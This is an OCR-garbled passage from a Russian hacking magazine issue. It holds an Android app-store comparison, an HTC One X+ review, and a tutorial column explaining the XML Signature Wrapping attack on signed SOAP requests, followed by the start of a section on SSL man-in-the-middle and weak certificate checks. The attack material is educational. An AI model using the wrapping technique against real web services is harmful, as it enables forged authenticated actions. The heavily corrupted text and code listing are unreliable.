120 производителей устройств (рас- 
полагающихся в Китае) предустанав- 
ливают на свои устройства именно 
его. Конкуренция здесь значительно 
ниже, чем в боодіе РІау, а поль- 
зователей больше, чем в Атагоп. 
Платить за приложения азиаты 
не очень любят, но вот бесплатные 
скачивают порой намного охотнее, 
чем избалованные юзеры в главном 
магазине для Апбгоісі 05. Поэтому 
если твоя программа не претендует 
на огромные продажи и ты решил 
распространять ее бесплатно, за- 
рабатывая на рекламе, то на 5Ііс1еМЕ 
стоит обратить внимание. 

Модерация проходит быстрее, 
чем в Атагоп, и занимает обычно 
два-три дня. Но подходят к провер- 
ке ответственней, порой чересчур. 
По условиям программа не может 
содержать ссылок, перенаправ- 
ляющих на боодіе РІау или любой 
другой маркет. Но даже если ссыл- 
ка будет указывать на внешнюю 
страницу (например, на фейсбуке), 
содержащую ссылку на сторон- 
ний магазин, то вероятность бана 
весьма высока. Строго относятся 
к нарушениям копирайтов. При- 
ложения, эксплуатирующие чужую 
интеллектуальную собственность, 
просто не пройдут модерацию. 

Стоит заметить, что инструмента- 
рия для просмотра статистики в этом 
маркете нет. Ты не сможешь узнать 
ни о количестве скачиваний за опре- 
деленный день, ни посмотреть срав- 
нение, срезы по временным данным. 
Все, что можно узнать, — общее 
количество скачиваний для каж- 
дого приложения. И даже для этого 
тебе придется заходить на страницу 
каждой программы, так как никакой 
общей информации или таблиц 
не существует. Зато здесь есть за- 
грузки. У меня нет ни одного прило- 
жения, которое бы в 5ІісІеМЕ скачали 
меньше, чем в Атагоп. Сравнивая 
с боодіе РІау, можно увидеть, что все 
зависит от популярности приложе- 
ния. Малопопулярные приложения 
имеют ненамного меньше скачива- 
ний, а могут даже опережать (и даже 
в разы, но это касается программ. 



имеющих не больше пяти тысяч 
скачиваний) самый крупный маркет. 
Для популярных приложений раз- 
ница может быть на порядок. 



5А1У15иМ0АРР5 



Магазин 5атзипд — единствен- 
ный из маркетов производителей 
АпсІгоісІ -устройств, который дей- 
ствительно заслуживает внимания, 
хотя еще год назад уже при созда- 
нии публикации в батзипд Аррз 
очень хотелось вырвать руки себе 
и создателям сайта. Теперь сайт при- 
годен к использованию. Вот только, 
изменив интерфейс, в 5атзипд 
так ничего и не сделали с премо- 
дерацией. Проверкой приложения 
занимается большое количество 
инстанций, и, судя по ее длитель- 
ности, создается впечатление, 
что приложение тупо устанавливают 
на все когда-либо существовавшие 
телефоны и планшеты 5атзипд. 
Даже у Арріе проверка приложения 
занимает меньше времени. 

Зато когда ты получишь отчет 
о тестировании, станет понятно, 
что все это время происходило. 

Тебе пришлют полный перечень 
проблем, найденных тестером. 
Критические, которые привели 
к отклонению приложения, менее 
значимые, но рекомендуемые к ис- 
правлению, скриншоты, видео. Хотя 
бы только ради этого отчета стоит 
попробовать выложить программу 
в 5атзипд Аррз. Если ты все-таки 
смог дождаться, когда приложение 
проверят, и его не «завернули» 
по каким-то причинам (а для этого 
бывает достаточно, чтобы на од- 
ном из разрешений какая-нибудь 
надпись была не полностью видна), 
то ты сможешь получить загрузки, 
сравнимые со 5Іі(іеМЕ. Пользова- 
тели здесь тоже приходят именно 
за бесплатными приложениями. 
Разве что тут значительно больше 
русских, поэтому русско-язычные 
приложения будут скачивать чаще. 

Важная особенность этого ма- 
газина — наличие отдельного раз- 
дела, куда попадают все новые при- 
ложения (а не только популярные 
среди новых, как в боодіе РІау). Это 
обеспечивает стартовые загрузки, 
которые должны помочь твоему при- 
ложению попасть в тематический 
топ, нахождение там будет какое-то 
время поддерживать стабильные 
загрузки. Топ-20 будет давать около 
400 загрузок. Если программа в топ 
не попадет или уйдет оттуда, то и за- 
грузки прекратятся. 



ХАКЕР 02/169/2013 



053 










Х-МОВІІЕ 



Александр Расмус ІгазтизІдгеаІ.хакер.ги) 



АКЕЛА 

не промахнулся 

ОБЗОР СМАРТФОНА НТС ОНЕ Хі' 



За прошедший год производителям смартфонов не удалось приду- 
мать что-либо радикально новое. Новые экраны и чипсеты отличают- 
ся скорее по количественным показателям, а ІТЕ-бурление все еще 
происходит за пределами нашей страны. Поэтому формула топового 
смартфона становится как никогда проста: возьми лучшее, что есть 
на рынке, и собери из этого то, что нужно. Получилось ли это у НТС? 




БЕЗ СЮРПРИЗОВ 



НТС Опе Х+ использует дизайн своего пред- 
шественника, НТС Опе X, — чуть выгнутая 
форма, приятное на ощупь покрытие пластика 
а-ля «софттач». Диагональ экрана составляет 
уже стандартные для флагманов 4,7 дюйма, 
поэтому аппарат достаточно крупный, но будет 
хорошо лежать в руке у пользователей, при- 
выкших к этому формату. 

Смартфон не предусматривает внешних 
карточек или замены аккумулятора, поэтому 
задняя панель не снимается. Используются 
51М-карты стандарта тісгоЗІМ, что может по- 
казаться неудобным большинству пользовате- 
лей Апсігоісі, но с этим придется смириться — 
большинство флагманов 2012 года именно 
такого формата. 

Опе Х+ использует физические кнопки 
на лицевые панели вместо экранных кнопок, 
предусмотренных Апсігоісі 4. С одной сторо- 
ны, это экономит экранное пространство, 
с другой — многие приложения, не оптими- 
зированные под новые версии Апсігоісі (взять 
хотя бы Тѵѵіііег, РасеЬоок и многие игры), 
эмулируют четвертую кнопку и в результа- 
те все равно отнимают под нее ровно то же 
место. В остальном предусмотрен стандарт- 
ный набор физических клавиш — как всегда, 
отсутствует кнопка спуска камеры, но ее 
не предусматривают большинство произво- 
дителей (увы). 

Экран использует 5ирег ІСО матрицу, поэ- 
тому ее яркость заметно выше, чем у АМОІЕО- 
экранов, а цветовая гамма кажется чуть более 
честной (заметно, например, на веб-страницах 
с белым фоном). Разрешение составляет 1280 



на 720 точек, и, как уже говорилось, в данном 
случае пользователю действительно доступно 
ровно это пространство. 

Спецификации выросли по сравнению 
с Опе X: хотя используется тот же самый чипсет 
Тедга 3, взята более высокая тактовая частота 
(1700 МГц против 1500 — при работе несколь- 
ких ядер используется частота 1600 и 1400 
соответственно). Удвоен объем встроенной 
памяти (64 Гб против 32). Задняя камера по- 
прежнему имеет разрешение в 8 мегапиксе- 
лей, передняя получила апгрейд (1,6 мегапик- 
селей против 1,3). 

Пользователю доступен ВІиеІооіЬ 4.0, поэ- 
тому для использования смартфона в качестве 
модема такой интерфейс оказывается менее 
энергозатратным, чем режим ѴѴі-Рі-хотспота. 
Предусмотрен и МРС. Увы, кроме как про- 
верять количество поездок на карте метро 
в «Яндекс. метро», делать с ним по-прежнему 
почти нечего. Для подключения внешних 
устройств доступен разъем тісгоиЗВ-ОТб. 

С его же помощью можно подключить телефон 
и к внешнему дисплею (правда, понадобит- 
ся переходник МНІ). Также предусмотрены 
контакты для подключения док-станции, 
только вот самой док-станции в продаже нет 
(и не было для первой модели), поэтому их 
ценность сомнительна. 

На смартфоне предустановлена Апсігоісі 4.1, 
а также фирменная надстройка НТС 5еп5е 4+, 
в которой предусмотрен собственный браузер, 
аудиоплеер, поддержка проприетарных ак- 
сессуаров и традиционная система виджетов 
рабочего стола и несколько дополнительных 
программ. 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ 



Чипсет: МѴЮІА Тедга 3 ТЗЗ, четыре ядра + 
одно вспомогательное ядро, тактовая частота 
составляет 1,7 ГГц или 1,6 ГГц на ядро при работе 
нескольких ядер 
ОЗУ: 1 Гб 

Встроенная память: 64 Гб 

Экран: 4,7 дюйма, 1270 * 720 точек, матрица 

БирегІСО 2 

ОС: Апсігоісі 4.1 плюс фирменная надстройка НТС 
Бепзе 4+ 

Интерфейсы: ВІиеІооШ 4.0, МРС, ІІ5В-ОТ6. 
Поддержка дополнительных карт не предусмотрена 
Емкость батареи: 2100 мА • ч 
Вес: 130 г 

Цена: 28 990 рублей 



ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ 



Как уже говорилось, в НТС Опе Х+ использует- 
ся традиционная для фирмы надстройка Бепве. 
С момента выхода Апсігоісі 4.0 вендорские 
надстройки над интерфейсом кажутся мне 
пережитком прошлого: «четверка» принесла 
качественный и узнаваемый дизайн Ноіо, кото- 
рый был хорошо воспринят и пользователями, 
и разработчиками приложений. Дизайн Зепзе, 
использующий традиционный скевоморфизм 
а-ля І05, несколько конфликтует с абстракт- 



ным оформлением приложений. 


заточенных 


НТС Опе Х+ [ 


1315,3 мс 


Затзипд Оаіаху Ноіе 2 


1243,6 мс 


16 МехизА 


1 732,0 мс 


Затзипд баіаху Мехиз 


1836,6 мс 



таблица 1. Результаты теста Бипврібег 
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V. А ІІп ІР Ті 




Перекидные часики остались Менеджер задач — одно из немногих Проблемы с мультизадачностью 

на месте — 5еп$е живее всех живых полезных дополнений 5еп$е можно решить в скрытых настройках 



ПОД Ноіо, но стоит признать, что это не режет 
глаз так. как ТоисЬ\^І 2 у Затзипд. 

В состав Зепзе входит собственный брау- 
зер, приложение для заметок, синхронизиру- 
ющееся с Еѵегпоіе, собственный музыкальный 
плеер, а также ряд сторонних приложений, 
включая РоІагІБ ОНісе, — большинство можно 
удалить при желании. Честно говоря, мне так 
и не удалось найти преимущества штатного 
браузера по сравнению с СНготе, а музыкаль- 
ный плеер не поддерживает сервиса облачно- 
го хранилища музыки боодіе Мизіс. К слову, 
если ты еще не попробовал этот сервис — ско- 
рее вооружись любимым американским прокси 
(из простых — Веаг ТиппеІ, который мы со- 
ветуем в одном из прошлых выпусков рубрики 
ѴѴѴѴѴѴ2) и зарегистрируйся на ппивіс.доодіе. 
сопл . С его помощью синхронизация локальной 
аудиотеки со смартфоном по облаку становит- 
ся автоматизированным и удобным занятием. 

Однако производитель не ограничился из- 
менениями в дизайне — переделке подвер- 
глась даже система мультизадачности и управ- 
ления памятью. Благодаря более агрессивным 
механизмам освобождения ОЗУ (для этого фо- 
новые приложения прибиваются активнее, чем 
это происходит в штатном АпсігоісЛ производи- 
тель пытается добиться более плавной работы 
системы и меньшего энергопотребления. 

Негативный эффект этой системы остается 
предметом жарких споров еще со времен 
НТС Опе X. Дело в том, что при переводе 
приложения в фоновый режим оно может 
быть автоматически прибито в кратчайшие 
сроки. Это означает, что, переключившись 
от браузера на 20-30 секунд на любое другое 
приложение, вернуться в то же место не полу- 
чится: браузер будет фактически перезапущен 
с принудительной перезагрузкой страниц. Мне 
не удалось зафиксировать более проблемные 
проявления этой системы: некоторые пользо- 
ватели жалуются на то, что система прибивает 
плееры, работающие в фоне (опробовано 
на РІау Мизіс, штатном плеере и Типеіп Рабіо 
Рго), — похоже, что такие проблемы связаны 
скорее с тем, что разработчики некорректно 
определяют переход приложения в фоновый 
режим, но с тех пор ситуация исправилась. 

В любом случае в настройках доступна специ- 
альная опция (Оеѵеіорег Орііопз АбѵапсесІ -* 
ВаскдгоипсІ Ргосезз Іітіі), способная помочь, 
если ты столкнешься с проблемами. 

В общем и целом, думаю, что буду не оди- 
нок, если скажу, что Апгігоісі-производителям 




Приложения, не адаптированные под Апсігоісі 4, эмулируют 
четвертую клавишу в виде черной полосы, сводя на нет 
попытки НТС сэкономить экранное пространство 



стоит перестать корежить стандартный интер- 
фейс Апсігоісі и сфокусироваться на железе, 
аксессуарах и партнерстве с популярными 
облачными сервисами (почему НТС не дого- 
ворился с Еѵегпоіе о премиальной подписке 
для своего приложения заметок? Впрочем, 
традиционный бонус ОгорЬох на месте). Однако 
все без исключения игроки на рынке боятся 
того, что без надстройки они не будут иметь 
«собственного» лица в глазах потребителя. 
Впрочем, на момент написания заметки ребята 
из СуаподепМоб уже вовсю тестируют версию 
прошивки для НТС Опе X, а значит, что и для Х+ 
«чистый» Апсігоісі появится достаточно скоро. 



АППАРАТНОЕ ОБЕСПЕЧЕНИЕ 



Как уже говорилось, в Опе Х+ перешли на топо- 
вую версию Тедга 3 — такую же, как и, напри- 
мер, в игровой приставке Оиуа. С результатами 
тестов можно ознакомиться в соответствую- 
щей таблице. Мы проводили сравнение только 
с телефонами, которые были у нас на руках, 
поэтому, к сожалению, у нас нет собственных 
результатов тестирования современных чипов 
Оиаісоглт — результаты теста 16 Мехиз 4 взя- 
ты с сайта разработчика бенчмарка. Результа- 
ты для баіаху Мехиз приведены для сравнения 
с прошлым поколением флагманов. 

Флагманские чипсеты Тедга 3 ТЗЗ, Баппзипд 
Ехупоз 4412 и Оиаісоглт Зпарсігадоп 54 
АР08064, как и ожидалось, идут ноздря в ноз- 
дрю, и разница не видна ни на синтетических 
тестах, ни в реальной жизни. Сложно предста- 
вить, что кому-то не будет хватать такой произ- 



водительности ближайшие пару лет, но эн- 
тузиастам вряд ли стоит ожидать от текущих 
флагманов каких-либо сюрпризов до выхода 
новых моделей на Тедга 4 со товарищи. 

Оценка времени работы от батареи — край- 
не спорный момент. На мой взгляд, измерять 
ее в часах бессмысленно из-за разницы в том, 
как разные пользователи нагружают свой 
смартфон. Логичнее измерять эту величину 
в днях — ведь фактически важно только то, 
понадобится ли заряжать телефон в конце дня. 
В стандартном режиме (активное использо- 
вание приложений, плеер, без игр) телефон 
продержался у меня полтора дня, что означает, 
что к концу первого дня его все равно придется 
ставить на зарядку, но сутки он продержится 
почти под любой нагрузкой. 



РЕЗЮМЕ 



Сильной стороной Опе Х+ является отличная 
сборка и экран — по сравнению с Затзипд 
аппарат получился намного приятнее, а матри- 
ца без АМОІЕО вообще редкость в наши дни. 
По сравнению с 5 III и баіаху Моіе 2 удачной 
кажется даже надстройка Бепзе, хотя, повто- 
рюсь, в идеальном мире на таком смартфоне 
хотелось бы видеть чистый Апсігоісі. Произво- 
дительность находится на том уровне, когда 
сравнивать ее с другими аппаратами стано- 
вится неинтересно, — ее хватит для любых 
повседневных задач, и система достаточно 
хорошо «допилена» производителем с точки 
зрения отзывчивости. У НТС получился один 
из самых достойных флагманов на рынке. □□ 



Устройство 


Общий рейтинг 


СРО 


ОРУ 


РАМ 


1/0 


НТС Опе Х+ 


15 798 


8195 


4157 


2 546 


900 


Батзипд баіаху МоСе 2 


18211 


8 535 


5 528 


3 303 


845 


16 Мехиз 4 


17461 


6 493 


7 983 


2319 


666 


Батзипд баіаху Мехиз 


7 429 


3 053 


2480 


1 232 


664 



Таблица 2. Результаты бенчмарка АпТиТи 3.0.3 
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ОБОЙТИ ПРОВЕРКУ ПОДПИСИ В 
(ХМІ 5І6МАТ0КЕ >ѴВАРРІМ6) 



ІРЕШЕНИЕІ 

Сегодня «большим вопросом» в ЕазуНаск будет тема атак 
на ХМС. Это часть того, что я показывал на воркшопе 
на ЕегоМідЫз. Если точнее, то я опишу атаку ХМІ Бідпаіиге 
^гарріпд (Х$\А/). Но давай обо всем по порядку. Сначала общая 
теория в очень упрощенном виде. 

Есть такое понятие, как «веб-сервис». Это некоторый ин- 
терфейс для взаимодействия между компьютерами. В качестве 
формата общения между ними используется ХМІ, а если точнее, 
то его подвид — $ОАР (Зітріе 0Ь]ес1 Ассезв Ргоіосоі). То есть 
в общем виде зто некий НТТР-сервер, на котором по определен- 
ному иРІ'у висит веб-сервис в ожидании 50АР-запросов. Он их 
принимает, парсит, выполняет и отвечает в виде 50АР-ответов. 

В качестве примера веб-сервиса (-ов) можно взять какой- 
нибудь продукт от ѴМѵѵаге, Е5Хі-сервер например. Когда мы 
подключаемся к нему, используя стандартный ѵБрЬеге-клиент, 
то, подсмотрев трафик, увидим множество 50АР запросов и от- 
ветов. Крутостей у БОАР'а много. Например, мы можем сделать 
для ѴМѵѵаге свой клиент, на основании стандартных 50АР- 
библиотек почти на любом языке, и управлять сервером из кон- 
соли. Далее нам следует познакомиться с такой штукой, как ХМІ 
Бідпаіиге. 

ХМЮБід — зто стандарт, описывающий, как должен подпи- 
сываться ХМІ-документ. Зачем это надо? Для того, чтобы сервер, 
получивший сообщение, был уверен, что его никто не изменил 
по пути. Зачем оно надо, если есть НТТР5 (5511? Это необходимо 



ХМІ 



ЗАДАЧА 



по причине того, что один ХМІ-документ может проходить несколь- 
ко посредников и надо быть уверенным, что никто из них ничего 
не изменит. К тому же один ХМІ-документ может быть подписан не- 
сколькими подписями (разные подписи на разные части докумен- 
та). И эти два момента невозможны с использованием 551. 

В качестве основы для создания подписей, используется, как 
ни странно, ассиметричное шифрование (если в курсе что это — 
пропусти абзац :). О ней нам надо знать следующее. Во-первых, 
что каждому закрытому ключу соответствует только один открытый 
ключ (пара). Во-вторых, зашифрованное одним ключом может быть 
расшифровано только другим ключом из пары. Поэтому если мы за- 
шифруем какое-то «сообщение» своим закрытым ключом, то полу- 
чивший это сообщение будет уверен, что именно мы его составили 
(и сообщение на пути никто не менял), так как сможет его расшиф- 
ровать нашим открытым ключом. Все просто, в общем ;). 

Далее интересное для тех, кто незнаком с ХМЮ5ід, — как «ра- 
ботает» стандарт. Чтобы не теоретизировать — покажу по пунктам 
на примере (см. рис. 1). На рисунке мы видим 50АР-пакет (строки 
1-41), который состоит из двух возможных элементов — Неасіег 
(2-33) и Во(1у (35-39). В Восіу содержится сам запрос с параметра- 
ми, которые фактически будут обрабатываться веб-сервисом (биз- 
нес-логика). В Неасіег — «заголовки» для 50АР-процессора. В них 
нас более всего интересует ХМЮ5ід — это строки 10-31. 

Основные отличия ХМЮ5ід от других стандартов подписей 
заключаются в следующем. В ХМ105ід мы не подписываем весь 
документ полностью и целиком, а только какие-то его элементы 
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(например, весь Восіу). К тому же с ХМІОБід мы имеем возможность 
использовать несколько подписей на разные элементы. Пред- 
положим, что есть документ, который должен пройти несколько 
звеньев. Каждое звено (сервер) будет получать данный документ, 
добавлять свой кусочек ХМІ — несколько элементов в Восіу, под- 
писывать их (и отмечать соответствующими заголовками в Неасіе) 
и передавать дальше. А в конце получающая сторона сможет про- 
верить подписи каждого изменения добавления данных на каждом 
звене. 

Так вот. Подписей может быть несколько. Обозначение под- 
писи — элемент Бідпаіиге (10). В нем есть три потомка: описание 
подписи — Бідпаіигеіпіо (11-28), сама подпись (29) и описание клю- 
ча клиента (30). Самое интересное — Зідпаіигеіпіо. В нем самые 
важные элементы для нас — Реіегепсе (14, 21). Это указатели на то, 
какие элементы должны быть подписаны. Например, Реіегепсе (14) 
указывает параметром ОРІ на «ісІ-22566565», а это — Восіу (35-39). 

И потому в этом Реіегепсе хранится хеш-значение от всего Восіу 
в элементе ОідезіѴаІие (19), а алгоритм хеширования указывается 
в предыдущем элементе — ОідезіМеіЬосІ (18). 

Еще есть элемент Тгапзіогтв (15-17), который может содержать 
в себе различные Тгапзіогт (16). Смысл их понятен из назва- 
ния. По сути, это определение преобразований данных, которые 
должны быть сделаны, перед тем как считать их хеш-сумму. Не- 
обходимо это потому, что ХМІ очень гибок семантически. То есть, 
например, мы можем между параметрами вставить много пере- 
носов и пробелов, но ХМІ-процессор все правильно воспримет. 

А вот для подсчета хеш-суммы это не годится. Потому и требуются 
«трансформации». Они указывают, по какому алгоритму стоит 
обработать данные, перед тем как считать хеш-сумму. Кстати, 
элемент СапопісаІІ7аІіопМеіИо(1 определяет примерно то же самое, 
только для самого элемента Бідпаіигеіпіо. 

И чтобы точно стало все ясно — покажу обратный пример. У нас 
есть элемент — ТітеБіатр (5-8), который указывает время жизни 
данного 50АР-запроса, чтобы запрос действовал только опреде- 
ленный период. Чтобы его не подменили/подделали, мы его подпи- 
сываем. Для этого ХМІ-процессор берет этот элемент (со всеми его 
потомками), трансформирует в стандартный вид (канонизирует), 
считает его хеш и кладет все это в заголовок 50АР-запроса с ука- 
занием того, что за место подписывается (Реіегепсе с Тітезіат-І 
(21)). Далее ХМІ-процессор проделывает аналогичные дей- 
ствия и с другими частями ХМЕ-документа, если это необходимо 
(Реіегепсе на Восіу — 14-я строка). Когда же заголовок Бідпесііпіо 
(11-28), описывающий, что подписывается, готов, ХМІ-процессор 
шифрует его, используя свой закрытый ключ, а итог кладет в поле 
БідпаІигеѴаІие — строка 29 (как и хеши, оно закодировано Вазе64). 
Думаю, что теперь точно должен быть понятен весь алгоритм. 

Таким образом, даже небольшое изменение подписанных 
элементов приведет к тому, что изменится их хеш-сумма, а потому 
изменение будет замечено принимающей стороной... Выглядит 
секьюрно? Да. Но не очень :). Итак, переходим к атаке. 

Еще только когда стандарт появился, нашлись люди, которые 
его поковыряли и наковыряли большую дыру. Было это где-то лет 
семь назад. Проблема заключается в гибкости ХМІ и его подписей. 
Посмотри, каким образом указывается ссылка на элемент, который 
подписан. Это элемент Реіегепсе с атрибутом 1)Р1. А в ІІРІ'е — 
значение атрибута элемента, типа «Тітезіатр-І». Технология, 
используемая для создания «ссылок», — ХРоіпІег. Да, мы легко 
можем найти этот элемент -Тітезіатр-і... Да, но постой! ХРоіпІег 
же не указывает на то, где этот подписанный элемент находится 
внутри ХМЕ-документов, то есть не указывает на его позицию 
относительно других элементов! А это значит, что мы можем 
переместить элемент (например, весь ТітеБіаглр) в другое место 
и при этом проверка подписи пройдет успешно. 

Итак, основа для атаки заключается в том, что подсистема при- 
нимающего ХМЕ-процессора, которая проверяет подпись, находит 
одни элементы и работает с ними, а уровень бизнес-логики при- 
ложения работает уже с другими элементами. Круто! 



1 <коар«лѵ:ЕлѵеІоре> 

2 г«мрепѵ:Неа(і«’> 

3 о«$м;5есип(у $озрелѵ:піи5Плк)м$ипд^*1’> 

4 

.4 <міи:Тіп№5(4пір «геигМ^'ТапеіГлпір-І*^ 

6 <«пи:Сгеа(е<1>гои- 11- 10X27:36:02.0792 </ѵ»мі:ОелІв<)> 

7 <«г$и:Ехрѵе5>г017- 11- 10X37:41:02.0792 '/«>мі;Е)[ріге5-> 

8 </м9и:Х«пе5(атр> 

10 «)5;5ідпаІиіе хл*в:()і=*іиір://«гтм.«гЭ.ог(і/гООО/09/хп4(Ьао«* М='5ідпаІиге-2‘> 

11 «1к:5ідпе<)1п1о> 

12 <і1$:СапопісакгаІіопМе{Ъо<] АІ9(ігі(Нт='Ъ((р://мт>.«Э огд/2ОО1/1О/0л<-вхс-с14п«* /> 

19 «)х:5«дпа1шеМе1Ъо<1 А1ооп(1«п-*Ъ((р://ммм.игЭ.ог9/2000/09/х)л1(1$)д*гм-1КаГ /> 

14 <ЗІ!!:ПёГег«ЛС« ІЖ1^*«1 (і-22566&6&'> 

15 <08:Х>ап$(опію> 

16 «І5:Хг4П5{о(іп АідотЪт.-'Ъир://«г«««.ѵ>Э.ог9/2001/10/хіт4-ехс-с14л*’ /> 

17 ^<Ь:Хгап$1опп» 

10 «Ь:0і9ез1Меикк1 АІ9о*:»іт>-.'Ьир://чѵ»((»*.*»3.<кд/г000/09/хіі*1»д»5Ьа1' /> 

19 <4і:0ідесІѴаІцв>2Е0в41А0ѴКРРСаХК51І1ЛаіЫо>=<;/<І5:0іда4ІѴаіім> 

70 </(І$:Ке1«гепсе> 

21 <Оі:КвГ«впсв Ши’'»Х*?>в*Іаіпр- 1 '> 

22 <05:Хгапс(олп5> •' 

23 <()$:Хгап«1олп АІдо<ііЪт-'Ьир://«ѵ«(і«.««3.ог9/2001/10/ллі-ехс-сІ4л** /> 

24 ^ік:Хгапа1оглк> 

25 <і1$:0«9е5ІМе№о(1 А1догіІЬт-*Ы(р://«г«г«.м3.огд/2000/09/»ііІ<І9д*«ілаГ /> 

26 <дз:Оі9в*ІѴаІие>2НЕ5еЬсевѵ«Іс1рМВ8ѴО»іНѴѴЦ9и4Л8=</(І5:Очв«ГѴаІив> 

27 </<І5:Яв(«хепсс> 

28 </а»:5<дпв<11п»о> 

29 <іЬ:5ідгиі1игеѴаіие>СМГ/1ѴК22К0624А] .. гкі>у9^ѴѴЗхѴѴХѵРѴ0тАХаН/пЬ|98и-</<1і;5м|па1игеѴаІііе> 

30 «Ь.ІСеуШІо 1а=9сеу1(1 404=446Х 1ХА...2*> . </а»:КсуІп(о> 

31 </4с:5ідгіа(іже> 

32 <7**б*в:5всип1у> 

33 </зоар«пѵ.Неа(Іе(> 

34 

35 ооарепѵ:Водѵ »»*и:1<1=П(1-г2566565'> 

36 <п*1:*сЬо> 

37 <п5І:рагашО>неІо м<хМс/п51:рагап<0> 

38 ^п9І:всЬо> 

39 </(оа(і«лѵ:Воі1у> 

40 

41 </хоарвпѵ:ЕпѵсІоре> 



Рис. 1. Пример подписанного 50АР-запроса 




Как же этого достичь? У нас есть масса вариаций. Вот пара 
примеров. Во-первых, посмотри рис. 2. Там мы настоящий Восіу 
перемещаем в Неасіег (а точнее, в фейковый элемент, который 
не обрабатывается 50АР-процессором), а также создаем свой Восіу 
с нашей нагрузкой, но с другим именем. 1^ когда сервер полу- 
чит такой 50АР-запрос, оно будет проверять подпись элемента 
Восіу из фейкового элемента в Неасіег (и подпись будет верна, так 
как хеш-значение будет неизмененным), а наш, хакерский Восіу 
уже попадет в само приложение. Оно ведь и верно, так как в при- 
ложение идет первый элемент Восіу элемента Епѵеіоре... Угар, 
как видишь! 

Но это еще не все. Я сказал, что у нас есть масса вариаций 
для того, чтобы прятать те или иные элементы. Зачем это нужно? 
Да затем, что ХМЕ-парсеров много, а они, как известно, име- 
ют каждый свои правила парсинга :). Приведу второй пример. 

В прошлом году в веб-сервисе от Атагоп, который используется 
для управления серверами, была найдена как раз такая бага (точ- 
нее, возможность проведения Х$^-атаки). И любой желающий, 
заполучив хотя бы один 50АР-запрос от жертвы на Амазон, имел 
возможность, используя Х5Ѵ^, выполнять ЛЮБЫЕ действия с сер- 
верами жертвы. Но Х5\Л/-атака была не стандартная, классическая 
там не проходила, так как в амазоновском сервисе была проверка 
на имена элементов (типа Восіу во всем документе должен был 
иметь именно определенное значение Ю). Зато в их ХМЕ-парсере 
была особенность, которой ресерчеры и воспользовались: 
ХМЕ-парсер для проверки подписи брал первый элемент Восіу, 
а в приложение попадал второй. Вообще-то, по стандарту в 50АР 
может быть только один Восіу, но парсеры такие парсеры... Таким 
образом, Амазон отлично атаковался Х5^ за счет использования 
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двух Восіу — первый с корректной подписью жертвы, а второй — 
с командами от хакера... 

Надеюсь, пояснил понятно, а то столько напечатать пришлось :). 

Здесь хотелось бы отметить несколько моментов. Хотя я и гово- 
рил о 50АР и веб-сервисах, но ХМІ 0516 на самом деле может ра- 
ботать и вне ЗОАР'а, на обычных ХМІ-документах. Разницы боль- 
шой нет. 50АР был избран в качестве основы для примеров потому, 
что является более стандартным. В обычных ХМІ-документах 
действуют более разнообразные алгоритмы того, какие данные по- 
падают в проверяльщик подписей, а какие в само приложение. 

Далее о минусах. Для проведения атаки, как ты, наверное, за- 
метил, нам надо иметь хотя бы одно подписанное 50АР-сообщение 
от жертвы. И это очень большая проблема данной атаки... Как его 
заполучить? Один из вариантов — атака тап-іп-иіе-ппіс1(іІе. Мы 



просто перехватим 50АР-запрос. Нода, скажешь ты, если это НТТР- 
протокол. А что делать, если НТТР5? Читай следующую задачу :). 

Очень советую понять сказанное хорошенько, так как в следую- 
щий раз (здесь не влезло) я продолжу тему, но уже про другое и эти 
знания нам понадобятся. 

Еще материалы по теме: ооо.о1/р2МЖ. ооо.оІ/сісіІІЗ . И еще один 
белый шар для Х5ѴѴ-атаки: несмотря на свою бородатость, атака 
эта актуальна. С 2011 года Юрай Соморовски Рига] Ботогоѵзку) 
и его коллеги проводили анализ этой проблемы в различных 
системах и фреймворках для создания веб-сервисов и обнаружи- 
ли, что большая их часть уязвима к Х5ѴѴ. А с учетом того, что веб- 
сервисы чаще всего являются частью каких-то крупных (гигант- 
ских) приложений, повсеместного внедрения патчей к Х5^ можно 
ждать еще очень долго. Вот тебе и олдскульная атака. 



ОБОЙТИ 551 



ЗАДАЧА 



ЕШШІІ 

Частично продолжим предыдущую задачу. Надо получить 
данные из 551. Что нам помешает? Шифрование. Шифрование 
мы можем обойти, если сделать МІТМ. Но в 551 есть провер- 
ка конечных узлов. То есть клиент может быть уверен в том, 
что он подключился именно к тому серверу, к которому хотел. 
Делается это с помощью проверки сертификата, который посы- 
лает сервер клиенту. Если опять-таки по-простому, то сертифи- 
кат представляет собой следующее. 

Это открытый ключ сервера, информация о сервере, удосто- 
веряющем центре и сроке «годности» сертификата (см. рисунок). 
Вся эта информация хешируется и подписывается удостове- 
ряющим центром (то есть шифруется закрытым ключом УЦ). 
Удостоверяющий центр (он же СегІіПсаІе аиіЬогіІу, СА) — это 
некие организации, которым клиент доверяет и чьи открытые 
ключи у него есть. А самая интересная информация о сервере 
для нас — «общее имя» (СМ). 

Таким образом, когда клиент получает сертификат, он должен 
проверить, что сертификат выдан именно на имя сервера (то есть 
СМ равен имени сервера в бРІе), действителен (даты) и что стоит 
валидная подпись от СА. Кстати, самоподписанные сертифика- 
ты — это те, в которых в качестве СА выступает тот же хост, чей это 
сертификат. 

Если мы попытаемся сделать МІТМ, то либо мы можем сгене- 
рить самоподписанный сертификат с именем (СМ) того сервера, ко- 
торый мы пытаемся подменить (но тогда клиент заметит МІТМ, так 
как увидит самоподписанный сертификат), либо нам надо, чтобы 
какой-нибудь СА подписал наш сертификат. Вот только возмож- 
ностей таких почти никогда нет. Есть, конечно, третий вариант — 
сделать так, чтобы клиент установил себе подконтрольный нам 
СА... То есть в теории проблем у клиента нет. Но есть практика. 

К нашей большой радости, у большинства браузеров уже нет 
сложностей с проверкой сертификатов, а основные СА не так часто 
компрометируют;). Зато недавнее исследование наших заморских 
коллег очень и очень меня посмешило. Название ему «ТЬе Мозі 
Оапдегоиз Сосіе іп іЬе \^ог1б: Ѵаіісіаііпд 551 Сегіііісаіез іп Моп- 
Вгоѵѵзег 5оЙ\л/аге» ( аоо.оІ/гпЕ21р ). Авторы исследования посмо- 
трели, как же обстоят дела с проверкой сертификатов у «небраузе- 
ров». Результаты оказались крутыми — очень разные приложения 
подвержены МІТМ'у. 

Основная проблема, как они пишут, в том, что кодеры не очень 
хорошо понимают все тонкости безопасности и к тому же во многом 
полагаются на фреймворки/языки. А они, особенно по умолчанию, 
часто не дают защиты. 

Если ты кодер, очень советую почитать. Если пентестер, то суть 
тех тестов, что они проводили, укладывается в следующее. Во- 
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первых, многие фреймворки / функции языков, которые отвечают 
за 55Е, разрешают подсоединение по 551, даже если сервер имеет 
